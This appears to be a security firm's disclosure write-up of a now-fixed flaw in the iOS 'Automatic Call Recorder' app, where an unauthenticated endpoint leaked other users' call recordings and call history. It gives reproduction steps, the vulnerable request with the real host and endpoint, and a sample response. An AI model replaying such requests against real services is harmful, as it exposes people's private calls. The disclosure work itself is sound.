The vulnerability allowed any malicious actor to listen to any user’s call recording from the cloud storage bucket of the application and an unauthenticated API endpoint that leaked the cloud storage URL of the victim’s data. 

Disclaimer

This vulnerability was responsibly disclosed by Anand Prakash, PingSafe, and is now fixed. Special thanks to Zack Whittaker from TechCrunch for helping us with the entire disclosure process and helping in getting this critical vulnerability fixed.

The “Automatic call recorder” application is a popular application used by iPhone users to record their calls.

The app is among the top-grossing in the Business category of the App Store, currently #15 in the downloads in the Business Category worldwide.

Anand, with the help of PingSafe’s threat intelligence product, discovered this vulnerability while doing open-source intelligence across mobile applications in different categories. PingSafe de-compiled the IPA file and figured out S3 buckets, host names, and other sensitive details used by the application.

The vulnerability allowed any malicious actor to listen to any user’s call recording from the cloud storage bucket of the application and an unauthenticated API endpoint that leaked the cloud storage URL of the victim’s data.

Vulnerability Details

This vulnerability existed in the “/fetch-sinch-recordings.php” API endpoint of the “Automatic Call Recorder” application. An attacker can pass another user’s number in the recordings request, and the API will respond with the recording URL of the storage bucket without any authentication. It also leaks the victim’s entire call history and the numbers on which calls were made.

Steps to Reproduce

1) Install the “Automatic Call Recorder” application on your phone.

2) Intercept application’s traffic in Burp Suite/Zap Proxy.

3) You will observe a POST API request to 167.88.123.157:80/fetch-sinch-recordings.php change UserID to the victim’s phone number with country code.

4) Response will have an s3 URL for the recording and other sensitive details.

Vulnerable Request

‍POST /fetch-sinch-recordings.php HTTP/1.1
Host: 167.88.123.157:80
Content-Type: application/JSON
Connection: close
Accept: */*
User-Agent: CallRecorder/2.25 (com.arun.callrecorderadvanced; build:1; iOS 14.4.0) Alamofire/4.7.3
Accept-Language: en-IN;q=1.0, kn-IN;q=0.9, hi-IN;q=0.8, hi-Latn-IN;q=0.7
Content-Length: 72
Accept-Encoding: gzip, deflate

{
 "UserID": "xxxxxx",
 "AppID": "xxx"

The Response

HTTP/1.1 200 OK
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 413
Connection: close
Content-Type: application/JSON

[
 {
   "start_time": "1604681",
   "start_time_iso": "2019-10-01T17:58:54+0100",
   "caller_number": "xxxxxxx",
   "callee": "+xxxxxxxxx",
   "marked_as_deleted": "0",
   "user_id": "xxxxxxxxxx",
   "sinch_app_id": "xxxxxxxxxxxx",
   "call_id": "xxxxxxx",
   "s3_key": "call_recordings/1011101/xyzrecording.wav"
 }
]

Timelines

February 27th, 2021 09:20 PM IST

Vulnerability discovered by Anand Prakash from PingSafe

February 27th, 2021 10:34 PM IST

The company did not have any responsible disclosure program and reached out to Zack Whittaker for help in the responsible disclosure. The issue was forwarded to the developer.

March 6th, 2021, 1:16 AM IST

Received confirmation from TechCrunch that the new build will get published anytime soon by the developer.

March 6th, 2021, 08:52 PM IST

The bug is fixed, and a new version is made live on App Store.

Security issues like this are catastrophic in nature. Along with impacting customer privacy, these also dent the company’s image and provide an added advantage to the competitors.

How PingSafe can Improve your Cloud Security

PingSafe uses the state-of-the-art intelligent risk evaluation engine to comprehensively monitor a company’s security health by assessing all domains, IPs, source codes, and leaked credentials.

Follow us on LinkedIn, Instagram and Twitter to get more details.